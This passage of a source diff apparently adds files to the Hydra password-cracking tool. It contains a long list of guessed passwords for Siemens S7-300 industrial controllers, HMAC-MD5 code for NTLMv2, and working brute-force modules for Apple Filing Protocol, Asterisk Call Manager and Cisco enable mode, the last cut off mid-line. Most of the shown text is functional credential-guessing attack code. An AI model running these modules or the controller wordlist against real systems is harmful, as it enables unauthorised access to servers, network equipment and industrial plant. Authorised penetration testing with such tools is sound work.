+siemens s7-300,,,,,SGILENT,,, +siemens s7-300,,,,,shadow,,, +siemens s7-300,,,,,SHADOW,,, +siemens s7-300,,,,,Sharp,,, +siemens s7-300,,,,,sicostart,,, +siemens s7-300,,,,,SICOSTART,,, +siemens s7-300,,,,,siemens,,, +siemens s7-300,,,,,SIEMENS,,, +siemens s7-300,,,,,simatic,,, +siemens s7-300,,,,,SIMATIC,,, +siemens s7-300,,,,,simens,,, +siemens s7-300,,,,,SIMENS,,, +siemens s7-300,,,,,simo,,, +siemens s7-300,,,,,SIMO,,, +siemens s7-300,,,,,simocode,,, +siemens s7-300,,,,,SIMOCODE,,, +siemens s7-300,,,,,simoreg,,, +siemens s7-300,,,,,SIMOREG,,, +siemens s7-300,,,,,simovert,,, +siemens s7-300,,,,,SIMOVERT,,, +siemens s7-300,,,,,simtec,,, +siemens s7-300,,,,,SIMTEC,,, +siemens s7-300,,,,,sirborn,,, +siemens s7-300,,,,,SIRBORN,,, +siemens s7-300,,,,,sitop,,, +siemens s7-300,,,,,SITOP,,, +siemens s7-300,,,,,SKY_FOX,,, +siemens s7-300,,,,,slave,,, +siemens s7-300,,,,,SLAVE,,, +siemens s7-300,,,,,slipknot,,, +siemens s7-300,,,,,SLIPKNOT,,, +siemens s7-300,,,,,SMDR,,, +siemens s7-300,,,,,smile,,, +siemens s7-300,,,,,SMILE,,, +siemens s7-300,,,,,smuser,,, +siemens s7-300,,,,,SMUSER,,, +siemens s7-300,,,,,snoopy,,, +siemens s7-300,,,,,SNOOPY,,, +siemens s7-300,,,,,soccer,,, +siemens s7-300,,,,,SOCCER,,, +siemens s7-300,,,,,solution,,, +siemens s7-300,,,,,SOLUTION,,, +siemens s7-300,,,,,SpIp,,, +siemens s7-300,,,,,ss,,, +siemens s7-300,,,,,SS,,, +siemens s7-300,,,,,SSA,,, +siemens s7-300,,,,,sss,,, +siemens s7-300,,,,,SSS,,, +siemens s7-300,,,,,ssss,,, +siemens s7-300,,,,,SSSS,,, +siemens s7-300,,,,,sssss,,, +siemens s7-300,,,,,SSSSS,,, +siemens s7-300,,,,,ssssss,,, +siemens s7-300,,,,,SSSSSS,,, +siemens s7-300,,,,,sssssss,,, +siemens s7-300,,,,,SSSSSSS,,, +siemens s7-300,,,,,ssssssss,,, +siemens s7-300,,,,,SSSSSSSS,,, +siemens s7-300,,,,,stan,,, +siemens s7-300,,,,,STAN,,, +siemens s7-300,,,,,star,,, +siemens s7-300,,,,,STAR,,, +siemens s7-300,,,,,starwar,,, +siemens s7-300,,,,,STARWAR,,, +siemens s7-300,,,,,step5,,, +siemens s7-300,,,,,STEP5,,, +siemens s7-300,,,,,step7,,, +siemens s7-300,,,,,STEP7,,, +siemens s7-300,,,,,stimpy,,, +siemens s7-300,,,,,STIMPY,,, +siemens s7-300,,,,,stl,,, +siemens s7-300,,,,,STL,,, +siemens s7-300,,,,,stop,,, +siemens s7-300,,,,,STOP,,, +siemens s7-300,,,,,ststic,,, +siemens s7-300,,,,,STSTIC,,, +siemens s7-300,,,,,summer,,, +siemens s7-300,,,,,SUMMER,,, +siemens s7-300,,,,,sunrise,,, +siemens s7-300,,,,,SUNRISE,,, +siemens s7-300,,,,,Super,,, +siemens s7-300,,,,,superid,,, +siemens s7-300,,,,,SUPERID,,, +siemens s7-300,,,,,superman,,, +siemens s7-300,,,,,SUPERMAN,,, +siemens s7-300,,,,,support,,, +siemens s7-300,,,,,SUPPORT,,, +siemens s7-300,,,,,surt,,, +siemens s7-300,,,,,SURT,,, +siemens s7-300,,,,,switch,,, +siemens s7-300,,,,,SWITCH,,, +siemens s7-300,,,,,sybase,,, +siemens s7-300,,,,,SYBASE,,, +siemens s7-300,,,,,Symbol,,, +siemens s7-300,,,,,SYMBOL,,, +siemens s7-300,,,,,synnet,,, +siemens s7-300,,,,,SYNNET,,, +siemens s7-300,,,,,sysadm,,, +siemens s7-300,,,,,SYSADM,,, +siemens s7-300,,,,,SYSDISC,,, +siemens s7-300,,,,,sysdisk,,, +siemens s7-300,,,,,system,,, +siemens s7-300,,,,,SYSTEM,,, +siemens s7-300,,,,,t,,, +siemens s7-300,,,,,T,,, +siemens s7-300,,,,,talent,,, +siemens s7-300,,,,,TALENT,,, +siemens s7-300,,,,,TALINUZ,,, +siemens s7-300,,,,,talisman,,, +siemens s7-300,,,,,TALISMAN,,, +siemens s7-300,,,,,TANDBERG,,, +siemens s7-300,,,,,TCH,,, +siemens s7-300,,,,,tech,,, +siemens s7-300,,,,,TECH,,, +siemens s7-300,,,,,telco,,, +siemens s7-300,,,,,TELCO,,, +siemens s7-300,,,,,telecom,,, +siemens s7-300,,,,,Telecom,,, +siemens s7-300,,,,,TELECOM,,, +siemens s7-300,,,,,telesup,,, +siemens s7-300,,,,,TELESUP,,, +siemens s7-300,,,,,tellabs#1,,, +siemens s7-300,,,,,telus,,, +siemens s7-300,,,,,TELUS,,, +siemens s7-300,,,,,temp,,, +siemens s7-300,,,,,TEMP,,, +siemens s7-300,,,,,temp123,,, +siemens s7-300,,,,,TEMP123,,, +siemens s7-300,,,,,test,,, +siemens s7-300,,,,,TEST,,, +siemens s7-300,,,,,test123,,, +siemens s7-300,,,,,TEST123,,, +siemens s7-300,,,,,thomas,,, +siemens s7-300,,,,,Thomas,,, +siemens s7-300,,,,,THOMAS,,, +siemens s7-300,,,,,tiaranet,,, +siemens s7-300,,,,,TIARANET,,, +siemens s7-300,,,,,tiger123,,, +siemens s7-300,,,,,TIGER123,,, +siemens s7-300,,,,,timely,,, +siemens s7-300,,,,,TIMELY,,, +siemens s7-300,,,,,tini,,, +siemens s7-300,,,,,TINI,,, +siemens s7-300,,,,,tivonpw,,, +siemens s7-300,,,,,TIVONPW,,, +siemens s7-300,,,,,tjm,,, +siemens s7-300,,,,,TJM,,, +siemens s7-300,,,,,tlah,,, +siemens s7-300,,,,,TLAH,,, +siemens s7-300,,,,,toolset,,, +siemens s7-300,,,,,TOOLSET,,, +siemens s7-300,,,,,trancell,,, +siemens s7-300,,,,,TRANCELL,,, +siemens s7-300,,,,,tratata,,, +siemens s7-300,,,,,TRATATA,,, +siemens s7-300,,,,,tslinux,,, +siemens s7-300,,,,,TSLINUX,,, +siemens s7-300,,,,,tt,,, +siemens s7-300,,,,,TT,,, +siemens s7-300,,,,,ttt,,, +siemens s7-300,,,,,TTT,,, +siemens s7-300,,,,,tttt,,, +siemens s7-300,,,,,TTTT,,, +siemens s7-300,,,,,ttttt,,, +siemens s7-300,,,,,TTTTT,,, +siemens s7-300,,,,,tttttt,,, +siemens s7-300,,,,,TTTTTT,,, +siemens s7-300,,,,,ttttttt,,, +siemens s7-300,,,,,TTTTTTT,,, +siemens s7-300,,,,,tttttttt,,, +siemens s7-300,,,,,TTTTTTTT,,, +siemens s7-300,,,,,tuborg,,, +siemens s7-300,,,,,TUBORG,,, +siemens s7-300,,,,,tuxalize,,, +siemens s7-300,,,,,TUXALIZE,,, +siemens s7-300,,,,,tx100,,, +siemens s7-300,,,,,TX100,,, +siemens s7-300,,,,,u,,, +siemens s7-300,,,,,U,,, +siemens s7-300,,,,,uplink,,, +siemens s7-300,,,,,UPLINK,,, +siemens s7-300,,,,,user,,, +siemens s7-300,,,,,USER,,, +siemens s7-300,,,,,uu,,, +siemens s7-300,,,,,UU,,, +siemens s7-300,,,,,uuu,,, +siemens s7-300,,,,,UUU,,, +siemens s7-300,,,,,uuuu,,, +siemens s7-300,,,,,UUUU,,, +siemens s7-300,,,,,uuuuu,,, +siemens s7-300,,,,,UUUUU,,, +siemens s7-300,,,,,uuuuuu,,, +siemens s7-300,,,,,UUUUUU,,, +siemens s7-300,,,,,uuuuuuu,,, +siemens s7-300,,,,,UUUUUUU,,, +siemens s7-300,,,,,uuuuuuuu,,, +siemens s7-300,,,,,UUUUUUUU,,, +siemens s7-300,,,,,v,,, +siemens s7-300,,,,,V,,, +siemens s7-300,,,,,vesoft,,, +siemens s7-300,,,,,VESOFT,,, +siemens s7-300,,,,,visual,,, +siemens s7-300,,,,,VISUAL,,, +siemens s7-300,,,,,vjqgfhjkm,,, +siemens s7-300,,,,,VJQGFHJKM,,, +siemens s7-300,,,,,vodka,,, +siemens s7-300,,,,,VODKA,,, +siemens s7-300,,,,,volition,,, +siemens s7-300,,,,,VOLITION,,, +siemens s7-300,,,,,vv,,, +siemens s7-300,,,,,VV,,, +siemens s7-300,,,,,vvv,,, +siemens s7-300,,,,,VVV,,, +siemens s7-300,,,,,vvvv,,, +siemens s7-300,,,,,VVVV,,, +siemens s7-300,,,,,vvvvv,,, +siemens s7-300,,,,,VVVVV,,, +siemens s7-300,,,,,vvvvvv,,, +siemens s7-300,,,,,VVVVVV,,, +siemens s7-300,,,,,vvvvvvv,,, +siemens s7-300,,,,,VVVVVVV,,, +siemens s7-300,,,,,vvvvvvvv,,, +siemens s7-300,,,,,VVVVVVVV,,, +siemens s7-300,,,,,w,,, +siemens s7-300,,,,,W,,, +siemens s7-300,,,,,W9F3,,, +siemens s7-300,,,,,webadmin,,, +siemens s7-300,,,,,WEBADMIN,,, +siemens s7-300,,,,,win,,, +siemens s7-300,,,,,WIN,,, +siemens s7-300,,,,,wincc,,, +siemens s7-300,,,,,WINCC,,, +siemens s7-300,,,,,winterm,,, +siemens s7-300,,,,,WINTERM,,, +siemens s7-300,,,,,Wireless,,, +siemens s7-300,,,,,WIRELESS,,, +siemens s7-300,,,,,wizard,,, +siemens s7-300,,,,,WIZARD,,, +siemens s7-300,,,,,wlsedb,,, +siemens s7-300,,,,,WLSEDB,,, +siemens s7-300,,,,,wolf,,, +siemens s7-300,,,,,WONF,,, +siemens s7-300,,,,,ww,,, +siemens s7-300,,,,,WW,,, +siemens s7-300,,,,,www,,, +siemens s7-300,,,,,WWW,,, +siemens s7-300,,,,,wwww,,, +siemens s7-300,,,,,WWWW,,, +siemens s7-300,,,,,wwwww,,, +siemens s7-300,,,,,WWWWW,,, +siemens s7-300,,,,,wwwwww,,, +siemens s7-300,,,,,WWWWWW,,, +siemens s7-300,,,,,wwwwwww,,, +siemens s7-300,,,,,WWWWWWW,,, +siemens s7-300,,,,,wwwwwwww,,, +siemens s7-300,,,,,WWWWWWWW,,, +siemens s7-300,,,,,wyse,,, +siemens s7-300,,,,,WYSE,,, +siemens s7-300,,,,,x,,, +siemens s7-300,,,,,X,,, +siemens s7-300,,,,,x40rocks,,, +siemens s7-300,,,,,X40ROCKS,,, +siemens s7-300,,,,,x-admin,,, +siemens s7-300,,,,,X-ADMIN,,, +siemens s7-300,,,,,xbox,,, +siemens s7-300,,,,,XBOX,,, +siemens s7-300,,,,,xlserver,,, +siemens s7-300,,,,,XLSERVER,,, +siemens s7-300,,,,,xx,,, +siemens s7-300,,,,,XX,,, +siemens s7-300,,,,,xxx,,, +siemens s7-300,,,,,XXX,,, +siemens s7-300,,,,,xxxx,,, +siemens s7-300,,,,,XXXX,,, +siemens s7-300,,,,,xxxxx,,, +siemens s7-300,,,,,XXXXX,,, +siemens s7-300,,,,,xxxxxx,,, +siemens s7-300,,,,,XXXXXX,,, +siemens s7-300,,,,,xxxxxxx,,, +siemens s7-300,,,,,XXXXXXX,,, +siemens s7-300,,,,,xxxxxxxx,,, +siemens s7-300,,,,,XXXXXXXX,,, +siemens s7-300,,,,,xxyyzz,,, +siemens s7-300,,,,,XXYYZZ,,, +siemens s7-300,,,,,y,,, +siemens s7-300,,,,,Y,,, +siemens s7-300,,,,,yxcv,,, +siemens s7-300,,,,,YXCV,,, +siemens s7-300,,,,,yy,,, +siemens s7-300,,,,,YY,,, +siemens s7-300,,,,,yyy,,, +siemens s7-300,,,,,YYY,,, +siemens s7-300,,,,,yyyy,,, +siemens s7-300,,,,,YYYY,,, +siemens s7-300,,,,,yyyyy,,, +siemens s7-300,,,,,YYYYY,,, +siemens s7-300,,,,,yyyyyy,,, +siemens s7-300,,,,,YYYYYY,,, +siemens s7-300,,,,,yyyyyyy,,, +siemens s7-300,,,,,YYYYYYY,,, +siemens s7-300,,,,,yyyyyyyy,,, +siemens s7-300,,,,,YYYYYYYY,,, +siemens s7-300,,,,,z,,, +siemens s7-300,,,,,Z,,, +siemens s7-300,,,,,z0ne,,, +siemens s7-300,,,,,Z0NE,,, +siemens s7-300,,,,,zettler,,, +siemens s7-300,,,,,ZETTLER,,, +siemens s7-300,,,,,zippo,,, +siemens s7-300,,,,,ZIPPO,,, +siemens s7-300,,,,,zone,,, +siemens s7-300,,,,,ZONE,,, +siemens s7-300,,,,,zoomadsl,,, +siemens s7-300,,,,,ZOOMADSL,,, +siemens s7-300,,,,,zorro,,, +siemens s7-300,,,,,ZORRO,,, +siemens s7-300,,,,,zorromen,,, +siemens s7-300,,,,,ZORROMEN,,, +siemens s7-300,,,,,zxc,,, +siemens s7-300,,,,,ZXC,,, +siemens s7-300,,,,,zxcv,,, +siemens s7-300,,,,,ZXCV,,, +siemens s7-300,,,,,zxcvb,,, +siemens s7-300,,,,,ZXCVB,,, +siemens s7-300,,,,,zxcvbn,,, +siemens s7-300,,,,,ZXCVBN,,, +siemens s7-300,,,,,zxcvbnm,,, +siemens s7-300,,,,,ZXCVBNM,,, +siemens s7-300,,,,,zxcvbnm,,,, +siemens s7-300,,,,,ZXCVBNM,,,, +siemens s7-300,,,,,zz,,, +siemens s7-300,,,,,ZZ,,, +siemens s7-300,,,,,zzz,,, +siemens s7-300,,,,,ZZZ,,, +siemens s7-300,,,,,zzzz,,, +siemens s7-300,,,,,ZZZZ,,, +siemens s7-300,,,,,zzzzz,,, +siemens s7-300,,,,,ZZZZZ,,, +siemens s7-300,,,,,zzzzzz,,, +siemens s7-300,,,,,ZZZZZZ,,, +siemens s7-300,,,,,zzzzzzz,,, +siemens s7-300,,,,,ZZZZZZZ,,, +siemens s7-300,,,,,zzzzzzzz,,, +siemens s7-300,,,,,ZZZZZZZZ,,, diff --git a/hmacmd5.c b/hmacmd5.c new file mode 100644 index 0000000..3220a9d --- /dev/null +++ b/hmacmd5.c @@ -0,0 +1,135 @@ + +/* + Unix SMB/CIFS implementation. + HMAC MD5 code for use in NTLMv2 + Copyright (C) Luke Kenneth Casson Leighton 1996-2000 + Copyright (C) Andrew Tridgell 1992-2000 + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. +*/ + +/* taken direct from rfc2104 implementation and modified for suitable use + * for ntlmv2. + */ +#ifdef LIBOPENSSL + +#include +#include "hmacmd5.h" + +#define ZERO_STRUCT(x) memset((char *)&(x), 0, sizeof(x)) + +/*********************************************************************** + the rfc 2104 version of hmac_md5 initialisation. +***********************************************************************/ + +void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context * ctx) { + int i; + unsigned char tk[16]; + + /* if key is longer than 64 bytes reset it to key=MD5(key) */ + if (key_len > 64) { + MD5_CTX tctx; + + MD5_Init(&tctx); + MD5_Update(&tctx, (void *) key, key_len); + MD5_Final(tk, &tctx); + + key = tk; + key_len = 16; + } + + /* start out by storing key in pads */ + ZERO_STRUCT(ctx->k_ipad); + ZERO_STRUCT(ctx->k_opad); + memcpy(ctx->k_ipad, key, key_len); + memcpy(ctx->k_opad, key, key_len); + + /* XOR key with ipad and opad values */ + for (i = 0; i < 64; i++) { + ctx->k_ipad[i] ^= 0x36; + ctx->k_opad[i] ^= 0x5c; + } + + MD5_Init(&ctx->ctx); + MD5_Update(&ctx->ctx, ctx->k_ipad, 64); +} + +/*********************************************************************** + the microsoft version of hmac_md5 initialisation. +***********************************************************************/ + +void hmac_md5_init_limK_to_64(const unsigned char *key, int key_len, HMACMD5Context * ctx) { + int i; + + /* if key is longer than 64 bytes truncate it */ + if (key_len > 64) { + key_len = 64; + } + + /* start out by storing key in pads */ + ZERO_STRUCT(ctx->k_ipad); + ZERO_STRUCT(ctx->k_opad); + memcpy(ctx->k_ipad, key, key_len); + memcpy(ctx->k_opad, key, key_len); + + /* XOR key with ipad and opad values */ + for (i = 0; i < 64; i++) { + ctx->k_ipad[i] ^= 0x36; + ctx->k_opad[i] ^= 0x5c; + } + + MD5_Init(&ctx->ctx); + MD5_Update(&ctx->ctx, ctx->k_ipad, 64); +} + +/*********************************************************************** + update hmac_md5 "inner" buffer +***********************************************************************/ + +void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context * ctx) { + MD5_Update(&ctx->ctx, (void *) text, text_len); /* then text of datagram */ +} + +/*********************************************************************** + finish off hmac_md5 "inner" buffer and generate outer one. +***********************************************************************/ +void hmac_md5_final(unsigned char *digest, HMACMD5Context * ctx) +{ + MD5_CTX ctx_o; + + MD5_Final(digest, &ctx->ctx); + + MD5_Init(&ctx_o); + MD5_Update(&ctx_o, ctx->k_opad, 64); + MD5_Update(&ctx_o, digest, 16); + MD5_Final(digest, &ctx_o); +} + +/*********************************************************** + single function to calculate an HMAC MD5 digest from data. + use the microsoft hmacmd5 init method because the key is 16 bytes. +************************************************************/ + +void hmac_md5(unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest) { + HMACMD5Context ctx; + + hmac_md5_init_limK_to_64(key, 16, &ctx); + if (data_len != 0) { + hmac_md5_update(data, data_len, &ctx); + } + hmac_md5_final(digest, &ctx); +} + +#endif diff --git a/hmacmd5.h b/hmacmd5.h new file mode 100644 index 0000000..c519da3 --- /dev/null +++ b/hmacmd5.h @@ -0,0 +1,40 @@ +/* + Unix SMB/CIFS implementation. + Interface header: Scheduler service + Copyright (C) Luke Kenneth Casson Leighton 1996-1999 + Copyright (C) Andrew Tridgell 1992-1999 + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. +*/ + +#include +#ifndef _HMAC_MD5_H + +typedef struct { + MD5_CTX ctx; + unsigned char k_ipad[65]; + unsigned char k_opad[65]; +} HMACMD5Context; + +#endif /* _HMAC_MD5_H */ + + +void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context *ctx); +void hmac_md5_init_limK_to_64(const unsigned char* key, int key_len,HMACMD5Context *ctx); +void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context *ctx); +void hmac_md5_final(unsigned char *digest, HMACMD5Context *ctx); +void hmac_md5( unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest); + + diff --git a/hydra-afp.c b/hydra-afp.c new file mode 100644 index 0000000..8309abe --- /dev/null +++ b/hydra-afp.c @@ -0,0 +1,184 @@ + +/* + * Apple Filing Protocol Support - by David Maciejak @ GMAIL dot com + * + * tested with afpfs-ng 0.8.1 + * AFPFS-NG: http://alexthepuffin.googlepages.com/home + * + */ + +#include "hydra-mod.h" + +#ifndef LIBAFP +void dummy_afp() { + printf("\n"); +} +#else + +#define FREE(x) \ + if (x != NULL) { \ + free(x); \ + x = NULL; \ + } + +#include +#include +#include + +extern char *HYDRA_EXIT; + +void stdout_fct(void *priv, enum loglevels loglevel, int logtype, const char *message) { + //fprintf(stderr, "[ERROR] Caught unknown error %s\n", message); +} + +static struct libafpclient afpclient = { + .unmount_volume = NULL, + .log_for_client = stdout_fct, + .forced_ending_hook = NULL, + .scan_extra_fds = NULL, + .loop_started = NULL, +}; + +static int server_subconnect(struct afp_url url) { + struct afp_connection_request *conn_req; + struct afp_server *server = NULL; + + conn_req = malloc(sizeof(struct afp_connection_request)); + server = malloc(sizeof(struct afp_server)); + + memset(conn_req, 0, sizeof(struct afp_connection_request)); + + conn_req->url = url; + conn_req->url.requested_version = 31; + + //fprintf(stderr, "AFP connection - username: %s password: %s server: %s\n", url.username, url.password, url.servername); + + if (strlen(url.uamname) > 0) { + if ((conn_req->uam_mask = find_uam_by_name(url.uamname)) == 0) { + fprintf(stderr, "[ERROR] Unknown UAM: %s", url.uamname); + FREE(conn_req); + FREE(server); + return -1; + } + } else { + conn_req->uam_mask = default_uams_mask(); + } + + //fprintf(stderr, "Initiating connection attempt.\n"); + if ((server = afp_server_full_connect(NULL, conn_req)) == NULL) { + FREE(conn_req); + FREE(server); + return -1; + } + //fprintf(stderr, "Connected to server: %s via UAM: %s\n", server->server_name_printable, uam_bitmap_to_string(server->using_uam)); + + FREE(conn_req); + FREE(server); + + return 0; +} + +int start_afp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + struct afp_url tmpurl; + + /* Build AFP authentication request */ + libafpclient_register(&afpclient); + afp_main_quick_startup(NULL); + init_uams(); + afp_default_url(&tmpurl); + + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + strncpy(tmpurl.servername, hydra_address2string(ip), AFP_SERVER_NAME_LEN - 1); + tmpurl.servername[AFP_SERVER_NAME_LEN] = 0; + memcpy(&tmpurl.username, login, AFP_MAX_USERNAME_LEN); + memcpy(&tmpurl.password, pass, AFP_MAX_PASSWORD_LEN); + + if (server_subconnect(tmpurl) == 0) { + hydra_report_found_host(port, ip, "afp", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } else { + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + } + return 1; +} + +void service_afp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_AFP; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + next_run = 2; + break; + + case 2: + + /* + * Here we start the password cracking process + */ + + next_run = start_afp(sock, ip, port, options, miscptr, fp); + break; + case 3: + + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + + default: + + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +#endif + +int service_afp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-asterisk.c b/hydra-asterisk.c new file mode 100644 index 0000000..7c369cc --- /dev/null +++ b/hydra-asterisk.c @@ -0,0 +1,137 @@ +//This plugin was written by david@ +// +//This plugin is written for Asterisk Call Manager +//which is running by default on TCP/5038 +// + +#include "hydra-mod.h" + + +extern char *HYDRA_EXIT; + +char *buf; + +int start_asterisk(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[1024]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s) > 0) { + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + free(buf); + } + memset(buffer, 0, sizeof(buffer)); + sprintf(buffer, "Action: Login\r\nUsername: %.250s\r\nSecret: %.250s\r\n\r\n", login, pass); + + if (verbose || debug) + hydra_report(stderr, "[VERBOSE] C: %s\n", buffer); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + + if (verbose || debug) + hydra_report(stderr, "[VERBOSE] S: %s\n", buf); + + if (buf == NULL || (strstr(buf, "Response: ") == NULL)) { + hydra_report(stderr, "[ERROR] Asterisk Call Manager protocol error or service shutdown: %s\n", buf); + free(buf); + return 4; + } + + if (strstr(buf, "Response: Success") != NULL) { + hydra_report_found_host(port, ip, "asterisk", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_asterisk(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_ASTERISK, mysslport = PORT_ASTERISK_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = myport; + } + + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + buf = hydra_receive_line(sock); + //fprintf(stderr, "%s\n",buf); + //banner should look like: + //Asterisk Call Manager/1.1 + + if (buf == NULL || strstr(buf, "Asterisk Call Manager/") == NULL) { + /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an Asterisk Call Manager protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + free(buf); + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_asterisk(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_asterisk_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-cisco-enable.c b/hydra-cisco-enable.c new file mode 100644 index 0000000..bd62ada --- /dev/null +++ b/hydra-cisco-enable.c @@ -0,0 +1,207 @@ +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +char *buf; + +int start_cisco_enable(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *pass, buffer[300]; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + sprintf(buffer, "%.250s\r\n", pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf != NULL && strstr(buf, "assw") != NULL) { + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + sprintf(buffer, "%.250s\r\n", pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (strstr(buf, "assw") != NULL) { + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + sprintf(buffer, "%.250s\r\n", pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + } + } + + if (buf != NULL + && (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "fail") != NULL || strstr(buf, "denied") != NULL)) { + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } + + if (buf != NULL) + free(buf); + hydra_report_found_host(port, ip, "cisco-enable", fp); + hydra_completed_pair_found(); + return 3; +} + +void service_cisco_enable(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1; + int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL; + char buffer[300]; + char *login; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + /* Cisco AAA Support */ + if (strlen(login = 